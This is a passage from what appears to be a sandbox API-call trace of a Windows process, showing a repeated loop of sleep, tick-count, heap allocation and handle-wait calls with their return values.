(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.170] GetTickCount () returned 0x2152f1c [0189.170] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64df0 [0189.170] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.170] GetTickCount () returned 0x2152f1c [0189.170] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.170] GetTickCount () returned 0x2152f1c [0189.170] GetTickCount () returned 0x2152f1c [0189.170] GetTickCount () returned 0x2152f1c [0189.170] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.170] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.170] GetTickCount () returned 0x2152f1c [0189.170] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e798f0 [0189.170] GetTickCount () returned 0x2152f1c [0189.171] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e798f0 | out: hHeap=0x2150000) returned 1 [0189.171] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64df0 | out: hHeap=0x2150000) returned 1 [0189.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.174] GetTickCount () returned 0x21537b2 [0189.174] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.174] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.174] GetTickCount () returned 0x21537b2 [0189.174] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.174] GetTickCount () returned 0x21537b2 [0189.174] GetTickCount () returned 0x21537b2 [0189.174] GetTickCount () returned 0x21537b2 [0189.174] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.174] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.174] GetTickCount () returned 0x21537b2 [0189.174] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.174] GetTickCount () returned 0x21537b2 [0189.174] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.174] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.177] GetTickCount () returned 0x2154048 [0189.177] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.177] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.177] GetTickCount () returned 0x2154048 [0189.177] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.177] GetTickCount () returned 0x2154048 [0189.177] GetTickCount () returned 0x2154048 [0189.177] GetTickCount () returned 0x2154048 [0189.177] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.177] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.177] GetTickCount () returned 0x2154048 [0189.177] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.177] GetTickCount () returned 0x2154048 [0189.178] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.178] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.188] GetTickCount () returned 0x21548ee [0189.188] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.188] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.188] GetTickCount () returned 0x21548ee [0189.188] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.188] GetTickCount () returned 0x21548ee [0189.188] GetTickCount () returned 0x21548ee [0189.188] GetTickCount () returned 0x21548ee [0189.188] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.188] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.188] GetTickCount () returned 0x21548ee [0189.188] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.188] GetTickCount () returned 0x21548ee [0189.188] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.188] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.191] GetTickCount () returned 0x2155184 [0189.191] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0189.191] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.191] GetTickCount () returned 0x2155184 [0189.191] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.191] GetTickCount () returned 0x2155184 [0189.191] GetTickCount () returned 0x2155184 [0189.191] GetTickCount () returned 0x2155184 [0189.191] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.191] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.191] GetTickCount () returned 0x2155184 [0189.191] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e795c0 [0189.192] GetTickCount () returned 0x2155184 [0189.192] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e795c0 | out: hHeap=0x2150000) returned 1 [0189.192] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0189.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.195] GetTickCount () returned 0x2155a29 [0189.195] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0189.195] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.195] GetTickCount () returned 0x2155a29 [0189.195] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.195] GetTickCount () returned 0x2155a29 [0189.195] GetTickCount () returned 0x2155a29 [0189.195] GetTickCount () returned 0x2155a29 [0189.195] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.195] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.195] GetTickCount () returned 0x2155a29 [0189.195] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.195] GetTickCount () returned 0x2155a29 [0189.195] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.195] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0189.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.200] GetTickCount () returned 0x21562bf [0189.200] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0189.200] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.200] GetTickCount () returned 0x21562bf [0189.200] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.200] GetTickCount () returned 0x21562bf [0189.200] GetTickCount () returned 0x21562bf [0189.200] GetTickCount () returned 0x21562bf [0189.200] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.200] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.200] GetTickCount () returned 0x21562bf [0189.200] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.200] GetTickCount () returned 0x21562bf [0189.201] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.201] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0189.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.204] GetTickCount () returned 0x2156b55 [0189.204] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65230 [0189.204] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.204] GetTickCount () returned 0x2156b55 [0189.204] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.204] GetTickCount () returned 0x2156b55 [0189.204] GetTickCount () returned 0x2156b55 [0189.204] GetTickCount () returned 0x2156b55 [0189.204] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.204] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.204] GetTickCount () returned 0x2156b55 [0189.204] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.204] GetTickCount () returned 0x2156b55 [0189.204] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.204] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65230 | out: hHeap=0x2150000) returned 1 [0189.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.207] GetTickCount () returned 0x21573eb [0189.207] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.207] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.207] GetTickCount () returned 0x21573eb [0189.207] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.207] GetTickCount () returned 0x21573eb [0189.207] GetTickCount () returned 0x21573eb [0189.207] GetTickCount () returned 0x21573eb [0189.207] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.207] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.207] GetTickCount () returned 0x21573eb [0189.207] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.208] GetTickCount () returned 0x21573eb [0189.208] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.208] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.212] GetTickCount () returned 0x2157c91 [0189.212] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0189.212] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.212] GetTickCount () returned 0x2157c91 [0189.212] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.212] GetTickCount () returned 0x2157c91 [0189.212] GetTickCount () returned 0x2157c91 [0189.212] GetTickCount () returned 0x2157c91 [0189.212] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.212] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.212] GetTickCount () returned 0x2157c91 [0189.212] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.212] GetTickCount () returned 0x2157c91 [0189.212] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.212] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0189.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.215] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.216] GetTickCount () returned 0x2158527 [0189.216] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0189.216] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.216] GetTickCount () returned 0x2158527 [0189.216] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.216] GetTickCount () returned 0x2158527 [0189.216] GetTickCount () returned 0x2158527 [0189.216] GetTickCount () returned 0x2158527 [0189.216] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.216] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.216] GetTickCount () returned 0x2158527 [0189.216] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.216] GetTickCount () returned 0x2158527 [0189.217] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.217] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0189.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.218] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.220] GetTickCount () returned 0x2158dbd [0189.220] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0189.220] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.220] GetTickCount () returned 0x2158dbd [0189.220] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.220] GetTickCount () returned 0x2158dbd [0189.220] GetTickCount () returned 0x2158dbd [0189.220] GetTickCount () returned 0x2158dbd [0189.220] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.220] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.220] GetTickCount () returned 0x2158dbd [0189.220] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.220] GetTickCount () returned 0x2158dbd [0189.220] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.220] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0189.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.223] GetTickCount () returned 0x2159653 [0189.223] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0189.223] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.223] GetTickCount () returned 0x2159653 [0189.223] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79770 [0189.223] GetTickCount () returned 0x2159653 [0189.223] GetTickCount () returned 0x2159653 [0189.223] GetTickCount () returned 0x2159653 [0189.223] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79770 | out: hHeap=0x2150000) returned 1 [0189.223] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.223] GetTickCount () returned 0x2159653 [0189.223] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.223] GetTickCount () returned 0x2159653 [0189.224] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.224] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0189.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.227] GetTickCount () returned 0x2159ef8 [0189.227] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0189.227] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.227] GetTickCount () returned 0x2159ef8 [0189.227] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.227] GetTickCount () returned 0x2159ef8 [0189.227] GetTickCount () returned 0x2159ef8 [0189.227] GetTickCount () returned 0x2159ef8 [0189.227] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.227] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.227] GetTickCount () returned 0x2159ef8 [0189.227] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.227] GetTickCount () returned 0x2159ef8 [0189.227] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.227] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0189.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.232] GetTickCount () returned 0x215a78e [0189.232] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0189.232] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.232] GetTickCount () returned 0x215a78e [0189.232] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.232] GetTickCount () returned 0x215a78e [0189.232] GetTickCount () returned 0x215a78e [0189.232] GetTickCount () returned 0x215a78e [0189.232] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.232] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.232] GetTickCount () returned 0x215a78e [0189.232] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.232] GetTickCount () returned 0x215a78e [0189.232] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.232] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0189.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.235] GetTickCount () returned 0x215b024 [0189.235] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65230 [0189.235] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.235] GetTickCount () returned 0x215b024 [0189.235] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.235] GetTickCount () returned 0x215b024 [0189.235] GetTickCount () returned 0x215b024 [0189.235] GetTickCount () returned 0x215b024 [0189.235] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.235] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.235] GetTickCount () returned 0x215b024 [0189.235] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.235] GetTickCount () returned 0x215b024 [0189.236] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.236] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65230 | out: hHeap=0x2150000) returned 1 [0189.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.241] GetTickCount () returned 0x215b8ba [0189.241] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64eb0 [0189.241] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.241] GetTickCount () returned 0x215b8ba [0189.241] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.241] GetTickCount () returned 0x215b8ba [0189.241] GetTickCount () returned 0x215b8ba [0189.241] GetTickCount () returned 0x215b8ba [0189.241] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.241] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.241] GetTickCount () returned 0x215b8ba [0189.241] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.241] GetTickCount () returned 0x215b8ba [0189.241] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.241] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64eb0 | out: hHeap=0x2150000) returned 1 [0189.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.244] GetTickCount () returned 0x215c160 [0189.244] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0189.244] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.244] GetTickCount () returned 0x215c160 [0189.244] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.244] GetTickCount () returned 0x215c160 [0189.244] GetTickCount () returned 0x215c160 [0189.244] GetTickCount () returned 0x215c160 [0189.244] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.244] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.244] GetTickCount () returned 0x215c160 [0189.244] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.244] GetTickCount () returned 0x215c160 [0189.245] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.245] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0189.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.249] GetTickCount () returned 0x215c9f6 [0189.249] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0189.249] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.249] GetTickCount () returned 0x215c9f6 [0189.249] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.249] GetTickCount () returned 0x215c9f6 [0189.249] GetTickCount () returned 0x215c9f6 [0189.249] GetTickCount () returned 0x215c9f6 [0189.249] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.249] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.249] GetTickCount () returned 0x215c9f6 [0189.249] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.249] GetTickCount () returned 0x215c9f6 [0189.250] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.250] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0189.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.253] GetTickCount () returned 0x215d28c [0189.253] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0189.253] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.253] GetTickCount () returned 0x215d28c [0189.253] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.253] GetTickCount () returned 0x215d28c [0189.253] GetTickCount () returned 0x215d28c [0189.253] GetTickCount () returned 0x215d28c [0189.253] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.253] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.253] GetTickCount () returned 0x215d28c [0189.253] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.253] GetTickCount () returned 0x215d28c [0189.253] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.253] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0189.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.255] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.256] GetTickCount () returned 0x215db22 [0189.256] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0189.256] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.256] GetTickCount () returned 0x215db22 [0189.256] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.256] GetTickCount () returned 0x215db22 [0189.256] GetTickCount () returned 0x215db22 [0189.256] GetTickCount () returned 0x215db22 [0189.256] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.256] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.256] GetTickCount () returned 0x215db22 [0189.256] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.256] GetTickCount () returned 0x215db22 [0189.256] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.257] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0189.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.260] GetTickCount () returned 0x215e3c8 [0189.260] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0189.260] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.260] 